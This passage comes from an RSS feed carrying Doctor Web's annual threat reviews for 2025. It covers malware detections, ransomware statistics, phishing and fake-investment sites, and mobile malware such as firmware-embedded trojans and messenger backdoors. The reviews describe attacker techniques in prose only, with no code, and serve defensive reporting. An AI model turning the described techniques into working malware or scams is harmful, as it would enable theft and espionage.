    &lt;dt&gt;&lt;b&gt;JS.DownLoader.1225&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Heuristic detection for ZIP archives containing JavaScript files with suspicious names.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PackedNET.3223&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detection for malicious programs protected with a packer.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for a packed version of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious app, written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; performs various malicious actions that make it difficult for the main payload to be detected.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Encryption ransomware&lt;/h3&gt;

&lt;p&gt;Compared with 2024, in 2025 Doctor Web’s technical support service registered 35.98% fewer user requests to decrypt files affected by encryption trojans. How those requests were distributed over the year is shown in the graph below:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The most common encoders of 2025:&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; &lt;span class="font-normal"&gt;(23.22% of user requests)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;An encoder trojan also known as Mimic. It uses the &lt;span class="string"&gt;everything.dll&lt;/span&gt; library from the legitimate software Everything, which is designed to instantly locate files on Windows computers.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt; &lt;span class="font-normal"&gt;(3.33% of user requests)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;An encoder trojan based on the source code of the Conti encoder malware. It encrypts files using the ChaCha20 algorithm. Now that some of the threat actors’ C2 servers have been taken down and the private RSA encryption keys have been disclosed, files affected by some modifications of this trojan can be decrypted.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; &lt;span class="font-normal"&gt;(2.50% of user requests)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;An encoder trojan also known as Macop (&lt;b&gt;Trojan.Encoder.30572&lt;/b&gt; is one of its other variants). It is small in size, about 30-40 Kbytes. This is partially due to the fact that the trojan does not carry third-party cryptographic libraries and uses exclusively CryptoAPI functions for encryption and key generation. It uses the AES-256 algorithm to encrypt files, and the keys themselves are encrypted with RSA-1024.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; &lt;span class="font-normal"&gt;(2.31% of user requests)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;An encoder whose artifacts indicate that the hacker group C77L was involved in its creation.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; &lt;span class="font-normal"&gt;(2.13% of user requests)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;A ransomware trojan with multiple versions. Its current modifications use the AES-256+RSA algorithm to encrypt files.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Network fraud&lt;/h3&gt;

&lt;p&gt;In 2025, Doctor Web’s Internet analysts observed an increase in the number of phishing websites created for stealing &lt;i&gt;Telegram&lt;/i&gt; messenger accounts. Malicious actors used various techniques: fake authentication and authorization pages, fake messages from &lt;i&gt;Telegram&lt;/i&gt; support warning of alleged messenger-usage violations requiring account “verification”, etc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;An example of a phishing website informing the user that they must verify their Telegram account due to a violation of the platform’s terms of service&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Similar sites were also created to target users of other services, such as gaming platforms, online stores, and so on. The fakes could look like genuine Internet resources and invited potential victims to log into their account. If users fell for the trick, their confidential information ended up in the attackers’ hands.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A fake website for the Steam platform displays a phishing form for entering a login and password&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Users once again encountered various types of fraudulent online resources offering all sorts of gifts and bonuses as well as the chance to participate in certain “lucrative promotions”. Commonplace were fake sites of Russian marketplaces where visitors could supposedly participate in a prize drawing. The “winnings” were programmed into the websites, and to “receive” the prizes, victims were required to make a certain payment: for example, supposedly a tax, then a delivery fee for the goods, and then a fee to insure them. In other variations of this scam, the desired item was allegedly unavailable, but a cash equivalent was offered instead. To “get” the money, the user was likewise required to make some payments in the form of fees, insurance, etc. In the end, the victim never received any prize.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;An example of a fake marketplace website offering the chance to participate in a “prize drawing”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Variants of similar schemes included fake transport company websites targeting residents of Great Britain. These offered people the chance to participate in a drawing for transport cards that were supposedly tied to a certain event and allowed free use of public transportation services. After a “win”, fraudsters asked victims to provide personal data and pay a small “fee”.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A fraudulent website, allegedly belonging to a transportation company, offers people the chance to participate in a transport card drawing&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;All sorts of fraudulent finance-themed sites remained relevant. Once again popular with scammers were web resources offering opportunities to make money by trading on the market using automated systems based on unique algorithms and artificial intelligence technologies. Such sites are created to target users from many countries. They usually ask users who want to submit a “request” or register an “account” for personal information. That information ends up in the attackers’ hands, to be used at their discretion: threat actors can resell the data or continue luring potential victims into the fake investment service, demanding that they deposit money into the “trading” account.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;One fraudulent site offering access to an “investment platform” based on AI technologies was allegedly related to the Apple Corporation&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Many of these sites are created using similar templates in the form of a fake chat with a “virtual assistant” or an “employee” of a particular company, and the fraudsters contact potential victims by assuming one of those roles. Users are asked to answer several questions and then provide personal data.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;On one of the websites, scammers offered French users access to non-existent automated trading software called Trader AI, which would allegedly allow them to make money, starting from €3,500&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One Internet resource advertised an investment service that was supposedly built directly on the basis of the &lt;i&gt;Telegram&lt;/i&gt; messenger. This website promised an income of €10,000 per month, thanks to automated trading of global company shares “directly in the phone’s browser”.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A fraudulent website invites users to join a “Telegram platform” that supposedly trades stocks automatically&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Scammers also offered potential victims a chance to make money using “trading bots” that were supposedly created with the participation of large companies and services such as &lt;i&gt;Telegram&lt;/i&gt;, &lt;i&gt;WhatsApp&lt;/i&gt;, &lt;i&gt;TikTok&lt;/i&gt;, and others.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;An example of a website that invited potential victims to use a non-existent trading bot, allegedly related to the WhatsApp messenger&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Throughout 2025, our Internet analysts discovered new fraudulent sites offering users in many countries, including Russia and countries of the CIS (Commonwealth of Independent States) and Europe, opportunities to invest in the oil and gas sector. Typically, on such sites, potential victims are also asked to provide personal information, such as their first and last names, mobile phone number, email address, etc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A fraudulent site targeting Kyrgyz citizens offers them the opportunity to “make money from oil and gas”, promising large profits&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Our analysts observed the emergence of more fraudulent websites offering “government support” in the form of payments or compensation. For instance, commonly occurring in the Russian Internet segment were fraudulent web resources purporting to be connected to the &lt;i&gt;Gosuslugi (Госуслуги)&lt;/i&gt; portal.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;An example of a fraudulent website purporting to be linked to the Gosuslugi service and promising Russian users stable payments from the government and a major oil and gas company. To “participate” in the “payment program”, victims were asked to provide personal data&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Our experts also noted the emergence of more fake education project websites. These offered users opportunities to take various education and training courses to improve their financial literacy, master a particular profession, etc. To “access” the training, potential victims, as in many other similar schemes, were also asked for personal information.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;One of the fraudulent sites offering users the opportunity to learn English&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Doctor Web’s Internet analysts detected new fraudulent sites selling theater tickets. On such resources, fraudsters offer potential victims discounted tickets for purchase, but after making “payment”, the victims do not receive them.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;An example of a fraudulent website selling non-existent theater tickets&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In addition, new fake websites for private cinemas were also common. As in the case with the theater tickets, scammers offer potential victims movie tickets for purchase, but the victims end up handing over their money to the fraudsters.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The fake site of a private cinemaв&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Mobile devices&lt;/h3&gt;

&lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, in 2025, users were most likely to encounter the ad-displaying trojans &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; and also &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; programs, which, instead of providing the declared functionality, can load various websites, including fraudulent and malicious ones. &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; trojans were also more active. These are multifunctional threats that cybercriminals embed into the firmware of Android devices. Moreover, the number of &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojan attacks increased. At the same time, &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojans were less active.&lt;/p&gt;

&lt;p&gt;Last year, malware creators continued using various techniques to protect their malicious Android apps. One method involved converting DEX code to C code (also known as DCC).&lt;/p&gt;

&lt;p&gt;The most common unwanted apps were &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; programs. These offer users virtual rewards for completing various tasks and promise them that they can convert these rewards into real money. But, in reality, these apps do not have such an option. In addition, the apps &lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; were also frequently detected on protected devices. The former imitates the operation of an anti-virus and reports non-existent threats, offering to “cure” the infections if users purchase the full version of the software. The latter are programs modified via a popular cloud service. During this modification, dangerous system permissions and obfuscated code, whose purpose cannot be verified, are added to them.&lt;/p&gt;

&lt;p&gt;Programs modified with the NP Manager utility (these programs are detected as &lt;b&gt;Tool.NPMod&lt;/b&gt;) became the most widespread riskware. The NP Manager tool obfuscates the code of the modified programs and allows their digital signature verification to be bypassed. The most active adware apps in 2025 were &lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; programs, third-party &lt;i&gt;WhatsApp&lt;/i&gt; messenger mods that automatically open advertising links when the messenger is in use.&lt;/p&gt;

&lt;p&gt;In 2025, new cases of Android device firmware infections were identified. Our company informed users about one of them in April. Threat actors had preinstalled &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; malware into the system storage area of a number of budget smartphone models and used it to steal cryptocurrency from users. Other attackers managed to implant dangerous &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; trojans into the firmware of some other Android smartphone models. In addition, more cases of Android TV box sets having their firmware infected with new versions of the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; trojan, which our company &lt;a href="https://news.drweb.com/show/?i=14900&amp;lng=en" target="_blank"&gt;discovered&lt;/a&gt; in 2024, have been recorded.&lt;/p&gt;

&lt;p&gt;Over the past year, Doctor Web’s anti-virus laboratory identified a number of dangerous malicious programs. In April, we informed users about the &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; trojan, which was hidden in Alpine Quest mapping software that had been modified by threat actors. &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; targeted Russian military personnel and sent the attackers information about their infected devices: mobile phone numbers and accounts, collected phonebook contacts, geolocation data, and information about the files stored in the devices’ memory. It could also steal certain files when commanded to do so by the attackers. Malicious actors were interested in getting their hands on confidential documents sent via messengers and also in obtaining Alpine Quest location log files.&lt;/p&gt;

&lt;p&gt;In August, our specialists warned about the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; backdoor, which cybercriminals had disguised as an anti-virus and were distributing via direct messages in messengers. &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; steals confidential information and allows criminals to spy on users. Employees of Russian companies were this backdoor’s main target.&lt;/p&gt;

&lt;p&gt;In October, we informed users about the multi-functional backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, which our virus analysts discovered in modified versions of the &lt;i&gt;Telegram X&lt;/i&gt; messenger. This malware is also used to steal confidential data, including &lt;i&gt;Telegram&lt;/i&gt; logins and passwords, incoming SMS, chats in the messenger, and clipboard data. At the same time, the backdoor allows attackers to completely control the messenger and the victim’s hacked &lt;i&gt;Telegram&lt;/i&gt; account. To control the backdoor, cybercriminals used both a C2 server and a Redis database—something not seen previously in Android threats. &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; mainly targeted users in Indonesia and Brazil.&lt;/p&gt;

&lt;p&gt;To find out more about the security-threat landscape for mobile devices in 2025, read our &lt;a href="https://news.drweb.com/show/?i=15104&amp;lng=en" target="_blank"&gt;special overview&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Prospects and possible trends&lt;/h3&gt;

&lt;p&gt;In the New Year 2026, adware trojans that help cybercriminals make illegal profits will likely remain one of the most common threats to users. We can expect that malicious actors will increasingly use banking trojans, which also allow them to enrich themselves.&lt;/p&gt;

&lt;p&gt;Further growth in the popularity of various tools and techniques that help conceal malicious activity may occur. Such techniques include the use of packers and obfuscators, malicious droppers and multi-stage downloaders, and steganography to conceal payloads. In addition, when creating malicious software, cybercriminals, including those with little programming experience, will increasingly resort to the help of AI assistants. As a result, more families of malware will emerge, and the number of threats will increase.&lt;/p&gt;

&lt;p&gt;Government and corporate structures will once again be in the crosshairs of cybercriminals, resulting in further targeted attacks. New cases of firmware infections in Android smartphones, TV box sets and other types of mobile devices are also likely to occur, especially in the budget segment. Online scammers will remain active.&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15104&amp;lng=en</guid><title>Doctor Web’s review of virus activity on mobile devices in 2025</title><link>https://news.drweb.com/show/?i=15104&amp;lng=en&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;January 15, 2026&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Overview&lt;/h3&gt;

&lt;p&gt;&lt;newslead&gt;In 2025, Android device users were most likely to encounter ad-displaying trojans and fake apps used for fraudulent purposes.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;As in the previous year, the most common unwanted software programs were those offering game-like tasks to complete in exchange for virtual rewards. Users were promised the ability to convert their rewards into real money, but, in reality, no such opportunities were provided.&lt;/p&gt;

&lt;p&gt;The most active riskware programs were apps modified with the NP Manager tool. This tool obfuscates and protects the code of modified programs, making them more difficult to analyze and detect, and also allows digital signature verification to be bypassed once the programs are modified. The most commonly detected adware programs were unofficial WhatsApp messenger mods that automatically open advertising links when the app is in use.&lt;/p&gt;

&lt;p&gt;Last year, new cases of malware being implanted into the firmware of various Android device models were recorded. We informed users about one of them in spring 2025. Cybercriminals had managed to pre-install the &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; trojan on several budget smartphone models and used it to steal their victims’ cryptocurrency.&lt;/p&gt;

&lt;p&gt;Also in spring, our specialists discovered the &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; trojan, which threat actors had embedded into a modified version of Alpine Quest mapping software. This malware targeted Russian military personnel and was used for cyberespionage purposes.&lt;/p&gt;

&lt;p&gt;In late summer, Doctor Web’s anti-virus laboratory informed users about &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, a backdoor being distributed via popular messengers. The attackers used it to spy on employees of Russian companies and collect their confidential information.&lt;/p&gt;

&lt;p&gt;Already in the fall, we warned about the dangerous &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; backdoor, which cybercriminals had embedded into modifications of the Telegram X messenger. This malicious program allowed intruders to hack their victims’ Telegram accounts and control the messenger on behalf of the account owners.&lt;/p&gt;

&lt;p&gt;Over the last 12 months, Doctor Web’s anti-virus laboratory identified more than 180 threats on Google Play, which have been downloaded over 2,165,000 times. Among them were various trojans that subscribe users to paid services and fake apps used for fraud, as well as new adware and unwanted software.&lt;/p&gt;

&lt;p&gt;In 2025, malware creators continued utilizing various techniques aimed at complicating the analysis of malicious Android programs and evading anti-viruses. Converting DEX code into C code was one of the popular methods employed. In addition, our virus analysts noted that when creating malware, threat actors are using AI assistants that help write their apps’ code.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principal trends in 2025&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Ad-displaying trojans were once again the most common Android threats&lt;/li&gt;
        &lt;li&gt;The NP Manager tool, used to obfuscate the code of modified apps and allow digital signature verification to be bypassed after the apps are modified, has grown in popularity&lt;/li&gt;
        &lt;li&gt;Banking trojans were more active&lt;/li&gt;
        &lt;li&gt;New cases of Android devices with infected firmware have been identified&lt;/li&gt;
        &lt;li&gt;Cybercriminals continued using both new and well-known techniques to protect malware from detection and analysis&lt;/li&gt;
        &lt;li&gt;Malware creators have been actively using AI assistants to write malicious code&lt;/li&gt;
        &lt;li&gt;New threats emerged on Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;The most notable events of 2025&lt;/h3&gt;

&lt;p&gt;In April 2025, Doctor Web’s experts &lt;a href="https://news.drweb.com/show/?i=15002&amp;lng=en" target="_blank"&gt;uncovered&lt;/a&gt; a large-scale campaign to steal cryptocurrency from Android device owners. Threat actors compromised the supply chain of several Chinese manufacturers and embedded the &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; trojan into the firmware of several budget smartphone models. Malware creators built this trojan into a modified version of WhatsApp messenger. For this, they used the &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt; instrument, which allows them to alter the apps’ operating logic without changing their code.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercepts messages sent and received in the messenger, searches for the addresses of the Tron and Ethereum crypto wallets in them, and replaces them with addresses belonging to the attackers. At the same time, the trojan conceals this substitution, and in such messages, victims are shown the correct wallets. &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; also sends all &lt;em&gt;jpg&lt;/em&gt;, &lt;em&gt;png&lt;/em&gt;, and &lt;em&gt;jpeg&lt;/em&gt; images to threat actors in order to search for saved mnemonic phrases that allow access to crypto wallets. Cybercriminals also embedded &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; in dozens of other apps, including popular crypto wallet programs, QR scanners, and other messengers, like Telegram. These modifications were distributed through malicious websites.&lt;/p&gt;

&lt;p&gt;In 2025, new cases emerged of malware being preinstalled into the system area of Android devices. One malicious group, for example, was able to embed new versions of dangerous &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; trojans into the firmware of a number of budget smartphones. Triada malware poses a threat because it can infect the Zygote system process. This process is directly involved in launching all applications in the system, so Triada trojans can subsequently inject themselves into any application on the device, effectively gaining complete control over it. Threat actors use these trojans to download and install other malware as well as unwanted apps and adware. Moreover, attackers can use them to spy on victims, subscribe users to paid services, and so on. New cases of Android TV box sets having infected firmware were also identified. These cases involved new versions of the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; trojan, which our company &lt;a href="https://news.drweb.com/show/?i=14900&amp;lng=en" target="_blank"&gt;discovered&lt;/a&gt; in 2024. The Vo1d malware is a backdoor that places its component into the system area of infected devices and can covertly download and install third-party software upon receiving attackers’ commands.&lt;/p&gt;

&lt;p&gt;Also in April, our anti-virus laboratory &lt;a href="https://news.drweb.com/show/?i=15006&amp;lng=en" target="_blank"&gt;detected&lt;/a&gt; a campaign to distribute the &lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; spyware trojan, targeting Russian military personnel. Threat actors embedded this malware into one of the versions of Alpine Quest mapping software and distributed it via their Telegram channel, which they passed off as the official one. A Russian Android app catalog was another source for its distribution.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The Telegram channel that attackers used to distribute a malicious Alpine Quest modification containing &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Spy.1292.origin&amp;lng=en"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; sent a variety of confidential data to the cybercriminals, including mobile phone number and account information, phone book contacts, and the device’s geolocation and the files stored in its memory. The trojan could also steal certain files when commanded to do so by the attackers. Threat actors were interested in confidential documents that users sent via popular messaging apps as well as the Alpine Quest app’s location log file.&lt;/p&gt;

